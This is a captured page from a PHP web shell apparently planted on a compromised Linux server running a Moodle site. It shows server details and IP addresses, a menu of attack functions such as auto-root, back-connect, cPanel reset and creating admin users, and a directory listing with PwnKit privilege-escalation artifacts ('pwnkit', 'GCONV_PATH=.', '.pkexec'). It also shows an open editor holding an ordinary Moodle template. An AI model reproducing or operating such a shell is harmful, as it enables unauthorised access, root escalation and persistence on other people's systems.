Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.70.126.134
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
theme /
moove /
templates /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
block_myoverview
[ DIR ]
drwxr-xr-x
core
[ DIR ]
drwxr-xr-x
core_calendar
[ DIR ]
drwxr-xr-x
core_course
[ DIR ]
drwxr-xr-x
message
[ DIR ]
drwxr-xr-x
message_popup
[ DIR ]
drwxr-xr-x
mod_forum
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
accessibilitybar.mustache
2.44
KB
-rw-r--r--
blocks-drawer.mustache
1.11
KB
-rw-r--r--
breadcrumb.mustache
1.67
KB
-rw-r--r--
certificates.mustache
1.96
KB
-rw-r--r--
columns2.mustache
3.08
KB
-rw-r--r--
course_cover.mustache
3.2
KB
-rw-r--r--
custom_menu_footer.mustache
1.17
KB
-rw-r--r--
flat_navigation.mustache
3.22
KB
-rw-r--r--
footer.mustache
4.11
KB
-rw-r--r--
frontpage.mustache
3.03
KB
-rw-r--r--
frontpage_guest.mustache
3.45
KB
-rw-r--r--
frontpage_guest_loginbtn.musta...
1.58
KB
-rw-r--r--
frontpage_login.mustache
3.57
KB
-rw-r--r--
frontpage_marketing.mustache
3.33
KB
-rw-r--r--
frontpage_numbers.mustache
2.05
KB
-rw-r--r--
frontpage_sponsorsclients.must...
2.26
KB
-rw-r--r--
header.mustache
2.48
KB
-rw-r--r--
inc_end.mustache
1.68
KB
-rw-r--r--
inc_start.mustache
651
B
-rw-r--r--
incourse.mustache
4.05
KB
-rw-r--r--
lang_menu.mustache
1.58
KB
-rw-r--r--
login.mustache
2.19
KB
-rw-r--r--
maintenance.mustache
2.26
KB
-rw-r--r--
mydashboard.mustache
3.17
KB
-rw-r--r--
mydashboard_admin.mustache
1.63
KB
-rw-r--r--
mypublic.mustache
11.19
KB
-rw-r--r--
nav-drawer.mustache
1.34
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
slideshow.mustache
2.2
KB
-rw-r--r--
themesettings_modal.mustache
3.15
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : flat_navigation.mustache
{{! This file is part of Moodle - http://moodle.org/ Moodle is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. Moodle is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with Moodle. If not, see <http://www.gnu.org/licenses/>. }} {{! @template theme_moove/flat_navigation Display the flat navigation for the moove theme Classes required for JS: * none Data attributes required for JS: * none Context variables required for this template: * flatnavigation - array of flat_navigation_nodes * showdivider - boolean * action - string * isactive - boolean * get_indent - integer * is_section - boolean * text - HTML Example context (json): { "flatnavigation" : [ { "showdivider": false, "action": "#", "isactive": true, "get_indent": 1, "is_section": false, "text": "First" },{ "showdivider": true, "action": "#", "isactive": false, "get_indent": 0, "is_section": true, "text": "Last & Second" } ] } }} <ul class="list-group metismenu"> {{# flatnavigation }} {{#showdivider}} </ul> <ul class="list-group metismenu"> {{/showdivider}} {{#action}} {{^is_section}} <li class="list-group-item list-group-item-action {{#isactive}}active font-weight-bold{{/isactive}}" data-key="{{key}}"> <a href="{{{action}}}"> <span class="text m-l-{{get_indent}}">{{{text}}}</span> </a> </li> {{/is_section}} {{/action}} {{^action}} <li class="list-group-item" data-key="{{key}}"> <a class="m-l-{{get_indent}} has-arrow" href="javascript:void(0);"> {{#is_section}} {{#pix}}i/folder{{/pix}} {{/is_section}} <span class="text">{{{text}}}</span> </a> <ul> {{#children}} {{^is_section}} <li class="list-group-item list-group-item-action {{#isactive}}active font-weight-bold{{/isactive}}" data-key="{{key}}"> <a class="list-group-item list-group-item-action {{#isactive}}active font-weight-bold{{/isactive}}" href="{{{action}}}"> <span class="text">{{{text}}}</span> </a> </li> {{/is_section}} {{/children}} </ul> </li> {{/action}} {{/ flatnavigation }} </ul>
Close